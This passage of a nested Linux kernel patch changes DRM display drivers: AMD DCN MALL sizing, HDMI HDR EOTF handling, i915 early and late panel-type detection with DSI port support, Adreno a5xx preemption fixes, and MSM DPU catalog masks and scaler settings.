+ 			dcn3_21_soc.num_chans = dc->ctx->dc_bios->vram_info.num_chans;
++			dcn3_21_soc.mall_allocated_for_dcn_mbytes = (double)(dcn32_calc_num_avail_chans_for_mall(dc,
++				dc->ctx->dc_bios->vram_info.num_chans) * dc->caps.mall_size_per_mem_channel);
++		}
+ 
+ 		if (dc->ctx->dc_bios->vram_info.dram_channel_width_bytes)
+ 			dcn3_21_soc.dram_channel_width_bytes = dc->ctx->dc_bios->vram_info.dram_channel_width_bytes;
+diff --git a/drivers/gpu/drm/display/drm_hdmi_helper.c b/drivers/gpu/drm/display/drm_hdmi_helper.c
+index 0264abe552788..faf5e9efa7d33 100644
+--- a/drivers/gpu/drm/display/drm_hdmi_helper.c
++++ b/drivers/gpu/drm/display/drm_hdmi_helper.c
+@@ -44,10 +44,8 @@ int drm_hdmi_infoframe_set_hdr_metadata(struct hdmi_drm_infoframe *frame,
+ 
+ 	/* Sink EOTF is Bit map while infoframe is absolute values */
+ 	if (!is_eotf_supported(hdr_metadata->hdmi_metadata_type1.eotf,
+-	    connector->hdr_sink_metadata.hdmi_type1.eotf)) {
+-		DRM_DEBUG_KMS("EOTF Not Supported\n");
+-		return -EINVAL;
+-	}
++	    connector->hdr_sink_metadata.hdmi_type1.eotf))
++		DRM_DEBUG_KMS("Unknown EOTF %d\n", hdr_metadata->hdmi_metadata_type1.eotf);
+ 
+ 	err = hdmi_drm_infoframe_init(frame);
+ 	if (err < 0)
+diff --git a/drivers/gpu/drm/drm_atomic.c b/drivers/gpu/drm/drm_atomic.c
+index f197f59f6d99b..c0dc5858a7237 100644
+--- a/drivers/gpu/drm/drm_atomic.c
++++ b/drivers/gpu/drm/drm_atomic.c
+@@ -1070,6 +1070,7 @@ static void drm_atomic_connector_print_state(struct drm_printer *p,
+ 	drm_printf(p, "connector[%u]: %s\n", connector->base.id, connector->name);
+ 	drm_printf(p, "\tcrtc=%s\n", state->crtc ? state->crtc->name : "(null)");
+ 	drm_printf(p, "\tself_refresh_aware=%d\n", state->self_refresh_aware);
++	drm_printf(p, "\tmax_requested_bpc=%d\n", state->max_requested_bpc);
+ 
+ 	if (connector->connector_type == DRM_MODE_CONNECTOR_WRITEBACK)
+ 		if (state->writeback_job && state->writeback_job->fb)
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index d16b30a2dded3..cf5d2f8885f08 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -2043,7 +2043,8 @@ void icl_dsi_init(struct drm_i915_private *dev_priv)
+ 	/* attach connector to encoder */
+ 	intel_connector_attach_encoder(intel_connector, encoder);
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL, NULL);
++	encoder->devdata = intel_bios_encoder_data_lookup(dev_priv, port);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, encoder->devdata, NULL);
+ 
+ 	mutex_lock(&dev_priv->drm.mode_config.mutex);
+ 	intel_panel_add_vbt_lfp_fixed_mode(intel_connector);
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.c b/drivers/gpu/drm/i915/display/intel_bios.c
+index a491e6c38875d..ff4e6d0a5ba2f 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.c
++++ b/drivers/gpu/drm/i915/display/intel_bios.c
+@@ -620,14 +620,14 @@ static void dump_pnp_id(struct drm_i915_private *i915,
+ 
+ static int opregion_get_panel_type(struct drm_i915_private *i915,
+ 				   const struct intel_bios_encoder_data *devdata,
+-				   const struct edid *edid)
++				   const struct edid *edid, bool use_fallback)
+ {
+ 	return intel_opregion_get_panel_type(i915);
+ }
+ 
+ static int vbt_get_panel_type(struct drm_i915_private *i915,
+ 			      const struct intel_bios_encoder_data *devdata,
+-			      const struct edid *edid)
++			      const struct edid *edid, bool use_fallback)
+ {
+ 	const struct bdb_lvds_options *lvds_options;
+ 
+@@ -652,7 +652,7 @@ static int vbt_get_panel_type(struct drm_i915_private *i915,
+ 
+ static int pnpid_get_panel_type(struct drm_i915_private *i915,
+ 				const struct intel_bios_encoder_data *devdata,
+-				const struct edid *edid)
++				const struct edid *edid, bool use_fallback)
+ {
+ 	const struct bdb_lvds_lfp_data *data;
+ 	const struct bdb_lvds_lfp_data_ptrs *ptrs;
+@@ -701,9 +701,9 @@ static int pnpid_get_panel_type(struct drm_i915_private *i915,
+ 
+ static int fallback_get_panel_type(struct drm_i915_private *i915,
+ 				   const struct intel_bios_encoder_data *devdata,
+-				   const struct edid *edid)
++				   const struct edid *edid, bool use_fallback)
+ {
+-	return 0;
++	return use_fallback ? 0 : -1;
+ }
+ 
+ enum panel_type {
+@@ -715,13 +715,13 @@ enum panel_type {
+ 
+ static int get_panel_type(struct drm_i915_private *i915,
+ 			  const struct intel_bios_encoder_data *devdata,
+-			  const struct edid *edid)
++			  const struct edid *edid, bool use_fallback)
+ {
+ 	struct {
+ 		const char *name;
+ 		int (*get_panel_type)(struct drm_i915_private *i915,
+ 				      const struct intel_bios_encoder_data *devdata,
+-				      const struct edid *edid);
++				      const struct edid *edid, bool use_fallback);
+ 		int panel_type;
+ 	} panel_types[] = {
+ 		[PANEL_TYPE_OPREGION] = {
+@@ -744,7 +744,8 @@ static int get_panel_type(struct drm_i915_private *i915,
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(panel_types); i++) {
+-		panel_types[i].panel_type = panel_types[i].get_panel_type(i915, devdata, edid);
++		panel_types[i].panel_type = panel_types[i].get_panel_type(i915, devdata,
++									  edid, use_fallback);
+ 
+ 		drm_WARN_ON(&i915->drm, panel_types[i].panel_type > 0xf &&
+ 			    panel_types[i].panel_type != 0xff);
+@@ -2592,6 +2593,12 @@ intel_bios_encoder_supports_edp(const struct intel_bios_encoder_data *devdata)
+ 		devdata->child.device_type & DEVICE_TYPE_INTERNAL_CONNECTOR;
+ }
+ 
++static bool
++intel_bios_encoder_supports_dsi(const struct intel_bios_encoder_data *devdata)
++{
++	return devdata->child.device_type & DEVICE_TYPE_MIPI_OUTPUT;
++}
++
+ static int _intel_bios_hdmi_level_shift(const struct intel_bios_encoder_data *devdata)
+ {
+ 	if (!devdata || devdata->i915->display.vbt.version < 158)
+@@ -2642,7 +2649,7 @@ static void print_ddi_port(const struct intel_bios_encoder_data *devdata,
+ {
+ 	struct drm_i915_private *i915 = devdata->i915;
+ 	const struct child_device_config *child = &devdata->child;
+-	bool is_dvi, is_hdmi, is_dp, is_edp, is_crt, supports_typec_usb, supports_tbt;
++	bool is_dvi, is_hdmi, is_dp, is_edp, is_dsi, is_crt, supports_typec_usb, supports_tbt;
+ 	int dp_boost_level, dp_max_link_rate, hdmi_boost_level, hdmi_level_shift, max_tmds_clock;
+ 
+ 	is_dvi = intel_bios_encoder_supports_dvi(devdata);
+@@ -2650,13 +2657,14 @@ static void print_ddi_port(const struct intel_bios_encoder_data *devdata,
+ 	is_crt = intel_bios_encoder_supports_crt(devdata);
+ 	is_hdmi = intel_bios_encoder_supports_hdmi(devdata);
+ 	is_edp = intel_bios_encoder_supports_edp(devdata);
++	is_dsi = intel_bios_encoder_supports_dsi(devdata);
+ 
+ 	supports_typec_usb = intel_bios_encoder_supports_typec_usb(devdata);
+ 	supports_tbt = intel_bios_encoder_supports_tbt(devdata);
+ 
+ 	drm_dbg_kms(&i915->drm,
+-		    "Port %c VBT info: CRT:%d DVI:%d HDMI:%d DP:%d eDP:%d LSPCON:%d USB-Type-C:%d TBT:%d DSC:%d\n",
+-		    port_name(port), is_crt, is_dvi, is_hdmi, is_dp, is_edp,
++		    "Port %c VBT info: CRT:%d DVI:%d HDMI:%d DP:%d eDP:%d DSI:%d LSPCON:%d USB-Type-C:%d TBT:%d DSC:%d\n",
++		    port_name(port), is_crt, is_dvi, is_hdmi, is_dp, is_edp, is_dsi,
+ 		    HAS_LSPCON(i915) && child->lspcon,
+ 		    supports_typec_usb, supports_tbt,
+ 		    devdata->dsc != NULL);
+@@ -2709,6 +2717,8 @@ static void parse_ddi_port(struct intel_bios_encoder_data *devdata)
+ 	enum port port;
+ 
+ 	port = dvo_port_to_port(i915, child->dvo_port);
++	if (port == PORT_NONE && DISPLAY_VER(i915) >= 11)
++		port = dsi_dvo_port_to_port(i915, child->dvo_port);
+ 	if (port == PORT_NONE)
+ 		return;
+ 
+@@ -3199,14 +3209,26 @@ out:
+ 	kfree(oprom_vbt);
+ }
+ 
+-void intel_bios_init_panel(struct drm_i915_private *i915,
+-			   struct intel_panel *panel,
+-			   const struct intel_bios_encoder_data *devdata,
+-			   const struct edid *edid)
++static void intel_bios_init_panel(struct drm_i915_private *i915,
++				  struct intel_panel *panel,
++				  const struct intel_bios_encoder_data *devdata,
++				  const struct edid *edid,
++				  bool use_fallback)
+ {
+-	init_vbt_panel_defaults(panel);
++	/* already have it? */
++	if (panel->vbt.panel_type >= 0) {
++		drm_WARN_ON(&i915->drm, !use_fallback);
++		return;
++	}
+ 
+-	panel->vbt.panel_type = get_panel_type(i915, devdata, edid);
++	panel->vbt.panel_type = get_panel_type(i915, devdata,
++					       edid, use_fallback);
++	if (panel->vbt.panel_type < 0) {
++		drm_WARN_ON(&i915->drm, use_fallback);
++		return;
++	}
++
++	init_vbt_panel_defaults(panel);
+ 
+ 	parse_panel_options(i915, panel);
+ 	parse_generic_dtd(i915, panel);
+@@ -3221,6 +3243,21 @@ void intel_bios_init_panel(struct drm_i915_private *i915,
+ 	parse_mipi_sequence(i915, panel);
+ }
+ 
++void intel_bios_init_panel_early(struct drm_i915_private *i915,
++				 struct intel_panel *panel,
++				 const struct intel_bios_encoder_data *devdata)
++{
++	intel_bios_init_panel(i915, panel, devdata, NULL, false);
++}
++
++void intel_bios_init_panel_late(struct drm_i915_private *i915,
++				struct intel_panel *panel,
++				const struct intel_bios_encoder_data *devdata,
++				const struct edid *edid)
++{
++	intel_bios_init_panel(i915, panel, devdata, edid, true);
++}
++
+ /**
+  * intel_bios_driver_remove - Free any resources allocated by intel_bios_init()
+  * @i915: i915 device instance
+diff --git a/drivers/gpu/drm/i915/display/intel_bios.h b/drivers/gpu/drm/i915/display/intel_bios.h
+index e375405a78284..ff1fdd2e0c1c5 100644
+--- a/drivers/gpu/drm/i915/display/intel_bios.h
++++ b/drivers/gpu/drm/i915/display/intel_bios.h
+@@ -232,10 +232,13 @@ struct mipi_pps_data {
+ } __packed;
+ 
+ void intel_bios_init(struct drm_i915_private *dev_priv);
+-void intel_bios_init_panel(struct drm_i915_private *dev_priv,
+-			   struct intel_panel *panel,
+-			   const struct intel_bios_encoder_data *devdata,
+-			   const struct edid *edid);
++void intel_bios_init_panel_early(struct drm_i915_private *dev_priv,
++				 struct intel_panel *panel,
++				 const struct intel_bios_encoder_data *devdata);
++void intel_bios_init_panel_late(struct drm_i915_private *dev_priv,
++				struct intel_panel *panel,
++				const struct intel_bios_encoder_data *devdata,
++				const struct edid *edid);
+ void intel_bios_fini_panel(struct intel_panel *panel);
+ void intel_bios_driver_remove(struct drm_i915_private *dev_priv);
+ bool intel_bios_is_valid_vbt(const void *buf, size_t size);
+diff --git a/drivers/gpu/drm/i915/display/intel_connector.c b/drivers/gpu/drm/i915/display/intel_connector.c
+index 6205ddd3ded03..562da3b741e2d 100644
+--- a/drivers/gpu/drm/i915/display/intel_connector.c
++++ b/drivers/gpu/drm/i915/display/intel_connector.c
+@@ -54,7 +54,7 @@ int intel_connector_init(struct intel_connector *connector)
+ 	__drm_atomic_helper_connector_reset(&connector->base,
+ 					    &conn_state->base);
+ 
+-	INIT_LIST_HEAD(&connector->panel.fixed_modes);
++	intel_panel_init_alloc(connector);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index f07395065a69f..1b6989001ee2b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -291,7 +291,7 @@ struct intel_vbt_panel_data {
+ 	struct drm_display_mode *sdvo_lvds_vbt_mode; /* if any */
+ 
+ 	/* Feature bits */
+-	unsigned int panel_type:4;
++	int panel_type;
+ 	unsigned int lvds_dither:1;
+ 	unsigned int bios_lvds_val; /* initial [PCH_]LVDS reg val in VBIOS */
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 75070eb07d4bf..1edb21f698087 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -5202,6 +5202,9 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 		return false;
+ 	}
+ 
++	intel_bios_init_panel_early(dev_priv, &intel_connector->panel,
++				    encoder->devdata);
++
+ 	intel_pps_init(intel_dp);
+ 
+ 	/* Cache DPCD and EDID for edp. */
+@@ -5237,8 +5240,8 @@ static bool intel_edp_init_connector(struct intel_dp *intel_dp,
+ 	}
+ 	intel_connector->edid = edid;
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel,
+-			      encoder->devdata, IS_ERR(edid) ? NULL : edid);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel,
++				   encoder->devdata, IS_ERR(edid) ? NULL : edid);
+ 
+ 	intel_panel_add_edid_fixed_modes(intel_connector, true);
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_lvds.c b/drivers/gpu/drm/i915/display/intel_lvds.c
+index 7bf1bdfd03ec0..aecec992cd0d2 100644
+--- a/drivers/gpu/drm/i915/display/intel_lvds.c
++++ b/drivers/gpu/drm/i915/display/intel_lvds.c
+@@ -964,8 +964,8 @@ void intel_lvds_init(struct drm_i915_private *dev_priv)
+ 	}
+ 	intel_connector->edid = edid;
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL,
+-			      IS_ERR(edid) ? NULL : edid);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, NULL,
++				   IS_ERR(edid) ? NULL : edid);
+ 
+ 	/* Try EDID first */
+ 	intel_panel_add_edid_fixed_modes(intel_connector, true);
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.c b/drivers/gpu/drm/i915/display/intel_panel.c
+index 1640726bfbf6a..609fcdbd7d58d 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.c
++++ b/drivers/gpu/drm/i915/display/intel_panel.c
+@@ -661,6 +661,14 @@ intel_panel_mode_valid(struct intel_connector *connector,
+ 	return MODE_OK;
+ }
+ 
++void intel_panel_init_alloc(struct intel_connector *connector)
++{
++	struct intel_panel *panel = &connector->panel;
++
++	connector->panel.vbt.panel_type = -1;
++	INIT_LIST_HEAD(&panel->fixed_modes);
++}
++
+ int intel_panel_init(struct intel_connector *connector)
+ {
+ 	struct intel_panel *panel = &connector->panel;
+diff --git a/drivers/gpu/drm/i915/display/intel_panel.h b/drivers/gpu/drm/i915/display/intel_panel.h
+index 5c5b5b7f95b6c..4b51e1c51da62 100644
+--- a/drivers/gpu/drm/i915/display/intel_panel.h
++++ b/drivers/gpu/drm/i915/display/intel_panel.h
+@@ -18,6 +18,7 @@ struct intel_connector;
+ struct intel_crtc_state;
+ struct intel_encoder;
+ 
++void intel_panel_init_alloc(struct intel_connector *connector);
+ int intel_panel_init(struct intel_connector *connector);
+ void intel_panel_fini(struct intel_connector *connector);
+ enum drm_connector_status
+diff --git a/drivers/gpu/drm/i915/display/intel_sdvo.c b/drivers/gpu/drm/i915/display/intel_sdvo.c
+index 329b9d9af6679..21805c15d5eb8 100644
+--- a/drivers/gpu/drm/i915/display/intel_sdvo.c
++++ b/drivers/gpu/drm/i915/display/intel_sdvo.c
+@@ -2886,7 +2886,7 @@ intel_sdvo_lvds_init(struct intel_sdvo *intel_sdvo, u16 type)
+ 	if (!intel_sdvo_create_enhance_property(intel_sdvo, intel_sdvo_connector))
+ 		goto err;
+ 
+-	intel_bios_init_panel(i915, &intel_connector->panel, NULL, NULL);
++	intel_bios_init_panel_late(i915, &intel_connector->panel, NULL, NULL);
+ 
+ 	/*
+ 	 * Fetch modes from VBT. For SDVO prefer the VBT mode since some
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index 84481030883ac..662bdb656aa30 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -1916,7 +1916,7 @@ void vlv_dsi_init(struct drm_i915_private *dev_priv)
+ 
+ 	intel_dsi->panel_power_off_time = ktime_get_boottime();
+ 
+-	intel_bios_init_panel(dev_priv, &intel_connector->panel, NULL, NULL);
++	intel_bios_init_panel_late(dev_priv, &intel_connector->panel, NULL, NULL);
+ 
+ 	if (intel_connector->panel.vbt.dsi.config->dual_link)
+ 		intel_dsi->ports = BIT(PORT_A) | BIT(PORT_C);
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+index 660ba0db89002..047c5e8c87ff4 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_gpu.c
+@@ -151,8 +151,8 @@ static void a5xx_submit(struct msm_gpu *gpu, struct msm_gem_submit *submit)
+ 	OUT_RING(ring, 1);
+ 
+ 	/* Enable local preemption for finegrain preemption */
+-	OUT_PKT7(ring, CP_PREEMPT_ENABLE_GLOBAL, 1);
+-	OUT_RING(ring, 0x02);
++	OUT_PKT7(ring, CP_PREEMPT_ENABLE_LOCAL, 1);
++	OUT_RING(ring, 0x1);
+ 
+ 	/* Allow CP_CONTEXT_SWITCH_YIELD packets in the IB2 */
+ 	OUT_PKT7(ring, CP_YIELD_ENABLE, 1);
+@@ -806,7 +806,7 @@ static int a5xx_hw_init(struct msm_gpu *gpu)
+ 	gpu_write(gpu, REG_A5XX_RBBM_AHB_CNTL2, 0x0000003F);
+ 
+ 	/* Set the highest bank bit */
+-	if (adreno_is_a540(adreno_gpu))
++	if (adreno_is_a540(adreno_gpu) || adreno_is_a530(adreno_gpu))
+ 		regbit = 2;
+ 	else
+ 		regbit = 1;
+diff --git a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+index 7658e89844b46..f58dd564d122b 100644
+--- a/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
++++ b/drivers/gpu/drm/msm/adreno/a5xx_preempt.c
+@@ -63,7 +63,7 @@ static struct msm_ringbuffer *get_next_ring(struct msm_gpu *gpu)
+ 		struct msm_ringbuffer *ring = gpu->rb[i];
+ 
+ 		spin_lock_irqsave(&ring->preempt_lock, flags);
+-		empty = (get_wptr(ring) == ring->memptrs->rptr);
++		empty = (get_wptr(ring) == gpu->funcs->get_rptr(gpu, ring));
+ 		spin_unlock_irqrestore(&ring->preempt_lock, flags);
+ 
+ 		if (!empty)
+@@ -207,6 +207,7 @@ void a5xx_preempt_hw_init(struct msm_gpu *gpu)
+ 		a5xx_gpu->preempt[i]->wptr = 0;
+ 		a5xx_gpu->preempt[i]->rptr = 0;
+ 		a5xx_gpu->preempt[i]->rbase = gpu->rb[i]->iova;
++		a5xx_gpu->preempt[i]->rptr_addr = shadowptr(a5xx_gpu, gpu->rb[i]);
+ 	}
+ 
+ 	/* Write a 0 to signal that we aren't switching pagetables */
+@@ -257,7 +258,6 @@ static int preempt_init_ring(struct a5xx_gpu *a5xx_gpu,
+ 	ptr->data = 0;
+ 	ptr->cntl = MSM_GPU_RB_CNTL_DEFAULT | AXXX_CP_RB_CNTL_NO_UPDATE;
+ 
+-	ptr->rptr_addr = shadowptr(a5xx_gpu, ring);
+ 	ptr->counter = counters_iova;
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_device.c b/drivers/gpu/drm/msm/adreno/adreno_device.c
+index 36f062c7582f9..c5c4c93b3689c 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_device.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_device.c
+@@ -558,7 +558,8 @@ static void adreno_unbind(struct device *dev, struct device *master,
+ 	struct msm_drm_private *priv = dev_get_drvdata(master);
+ 	struct msm_gpu *gpu = dev_to_gpu(dev);
+ 
+-	WARN_ON_ONCE(adreno_system_suspend(dev));
++	if (pm_runtime_enabled(dev))
++		WARN_ON_ONCE(adreno_system_suspend(dev));
+ 	gpu->funcs->destroy(gpu);
+ 
+ 	priv->gpu_pdev = NULL;
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 83f1dd2c22bd7..e8a217d242ca7 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -12,11 +12,15 @@
+ #include "dpu_hw_catalog.h"
+ #include "dpu_kms.h"
+ 
+-#define VIG_MASK \
++#define VIG_BASE_MASK \
+ 	(BIT(DPU_SSPP_SRC) | BIT(DPU_SSPP_QOS) |\
+-	BIT(DPU_SSPP_CSC_10BIT) | BIT(DPU_SSPP_CDP) |\
++	BIT(DPU_SSPP_CDP) |\
+ 	BIT(DPU_SSPP_TS_PREFILL) | BIT(DPU_SSPP_EXCL_RECT))
+ 
++#define VIG_MASK \
++	(VIG_BASE_MASK | \
++	BIT(DPU_SSPP_CSC_10BIT))
++
+ #define VIG_MSM8998_MASK \
+ 	(VIG_MASK | BIT(DPU_SSPP_SCALER_QSEED3))
+ 
+@@ -26,10 +30,7 @@
+ #define VIG_SC7180_MASK \
+ 	(VIG_MASK | BIT(DPU_SSPP_QOS_8LVL) | BIT(DPU_SSPP_SCALER_QSEED4))
+ 
+-#define VIG_SM8250_MASK \
+-	(VIG_MASK | BIT(DPU_SSPP_QOS_8LVL) | BIT(DPU_SSPP_SCALER_QSEED3LITE))
+-
+-#define VIG_QCM2290_MASK (VIG_MASK | BIT(DPU_SSPP_QOS_8LVL))
++#define VIG_QCM2290_MASK (VIG_BASE_MASK | BIT(DPU_SSPP_QOS_8LVL))
+ 
+ #define DMA_MSM8998_MASK \
+ 	(BIT(DPU_SSPP_SRC) | BIT(DPU_SSPP_QOS) |\
+@@ -51,7 +52,7 @@
+ 	(DMA_MSM8998_MASK | BIT(DPU_SSPP_CURSOR))
+ 
+ #define MIXER_MSM8998_MASK \
+-	(BIT(DPU_MIXER_SOURCESPLIT) | BIT(DPU_DIM_LAYER))
++	(BIT(DPU_MIXER_SOURCESPLIT))
+ 
+ #define MIXER_SDM845_MASK \
+ 	(BIT(DPU_MIXER_SOURCESPLIT) | BIT(DPU_DIM_LAYER) | BIT(DPU_MIXER_COMBINED_ALPHA))
+@@ -283,10 +284,9 @@ static const struct dpu_caps msm8998_dpu_caps = {
+ };
+ 
+ static const struct dpu_caps qcm2290_dpu_caps = {
+-	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
++	.max_mixer_width = DEFAULT_DPU_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0x4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2,
+-	.ubwc_version = DPU_HW_UBWC_VER_20,
+ 	.has_dim_layer = true,
+ 	.has_idle_pc = true,
+ 	.max_linewidth = 2160,
+@@ -322,9 +322,9 @@ static const struct dpu_caps sc7180_dpu_caps = {
+ };
+ 
+ static const struct dpu_caps sm6115_dpu_caps = {
+-	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
++	.max_mixer_width = DEFAULT_DPU_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0x4,
+-	.qseed_type = DPU_SSPP_SCALER_QSEED3LITE,
++	.qseed_type = DPU_SSPP_SCALER_QSEED4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2, /* TODO: v2.5 */
+ 	.ubwc_version = DPU_HW_UBWC_VER_20,
+ 	.has_dim_layer = true,
+@@ -368,7 +368,7 @@ static const struct dpu_caps sc8180x_dpu_caps = {
+ static const struct dpu_caps sm8250_dpu_caps = {
+ 	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0xb,
+-	.qseed_type = DPU_SSPP_SCALER_QSEED3LITE,
++	.qseed_type = DPU_SSPP_SCALER_QSEED4,
+ 	.smart_dma_rev = DPU_SSPP_SMART_DMA_V2, /* TODO: v2.5 */
+ 	.ubwc_version = DPU_HW_UBWC_VER_40,
+ 	.has_src_split = true,
+@@ -632,19 +632,19 @@ static const struct dpu_ctl_cfg sdm845_ctl[] = {
+ static const struct dpu_ctl_cfg sc7180_ctl[] = {
+ 	{
+ 	.name = "ctl_0", .id = CTL_0,
+-	.base = 0x1000, .len = 0xE4,
++	.base = 0x1000, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 9),
+ 	},
+ 	{
+ 	.name = "ctl_1", .id = CTL_1,
+-	.base = 0x1200, .len = 0xE4,
++	.base = 0x1200, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 10),
+ 	},
+ 	{
+ 	.name = "ctl_2", .id = CTL_2,
+-	.base = 0x1400, .len = 0xE4,
++	.base = 0x1400, .len = 0x1dc,
+ 	.features = BIT(DPU_CTL_ACTIVE_CFG),
+ 	.intr_start = DPU_IRQ_IDX(MDP_SSPP_TOP0_INTR2, 11),
+ 	},
+@@ -838,9 +838,9 @@ static const struct dpu_sspp_cfg msm8998_sspp[] = {
+ 	SSPP_BLK("sspp_9", SSPP_DMA1, 0x26000,  DMA_MSM8998_MASK,
+ 		sdm845_dma_sblk_1, 5, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA1),
+ 	SSPP_BLK("sspp_10", SSPP_DMA2, 0x28000,  DMA_CURSOR_MSM8998_MASK,
+-		sdm845_dma_sblk_2, 9, SSPP_TYPE_DMA, DPU_CLK_CTRL_CURSOR0),
++		sdm845_dma_sblk_2, 9, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA2),
+ 	SSPP_BLK("sspp_11", SSPP_DMA3, 0x2a000,  DMA_CURSOR_MSM8998_MASK,
+-		sdm845_dma_sblk_3, 13, SSPP_TYPE_DMA, DPU_CLK_CTRL_CURSOR1),
++		sdm845_dma_sblk_3, 13, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA3),
+ };
+ 
+ static const struct dpu_sspp_cfg sdm845_sspp[] = {
+@@ -880,32 +880,32 @@ static const struct dpu_sspp_cfg sc7180_sspp[] = {
+ };
+ 
+ static const struct dpu_sspp_sub_blks sm6115_vig_sblk_0 =
+-				_VIG_SBLK("0", 2, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("0", 2, DPU_SSPP_SCALER_QSEED4);
+ 
+ static const struct dpu_sspp_cfg sm6115_sspp[] = {
+-	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SC7180_MASK,
+ 		sm6115_vig_sblk_0, 0, SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG0),
+ 	SSPP_BLK("sspp_8", SSPP_DMA0, 0x24000,  DMA_SDM845_MASK,
+ 		sdm845_dma_sblk_0, 1, SSPP_TYPE_DMA, DPU_CLK_CTRL_DMA0),
+ };
+ 
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_0 =
+-				_VIG_SBLK("0", 5, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("0", 5, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_1 =
+-				_VIG_SBLK("1", 6, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("1", 6, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_2 =
+-				_VIG_SBLK("2", 7, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("2", 7, DPU_SSPP_SCALER_QSEED4);
+ static const struct dpu_sspp_sub_blks sm8250_vig_sblk_3 =
+-				_VIG_SBLK("3", 8, DPU_SSPP_SCALER_QSEED3LITE);
++				_VIG_SBLK("3", 8, DPU_SSPP_SCALER_QSEED4);
+ 
+ static const struct dpu_sspp_cfg sm8250_sspp[] = {
+-	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_0", SSPP_VIG0, 0x4000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_0, 0,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG0),
+-	SSPP_BLK("sspp_1", SSPP_VIG1, 0x6000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_1", SSPP_VIG1, 0x6000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_1, 4,  SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG1),
+-	SSPP_BLK("sspp_2", SSPP_VIG2, 0x8000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_2", SSPP_VIG2, 0x8000, VIG_SC7180_MASK,
+ 		sm8250_vig_sblk_2, 8, SSPP_TYPE_VIG, DPU_CLK_CTRL_VIG2),
+-	SSPP_BLK("sspp_3", SSPP_VIG3, 0xa000, VIG_SM8250_MASK,
++	SSPP_BLK("sspp_3", SSPP_VIG3, 0xa000, VIG_SC7180_MASK,
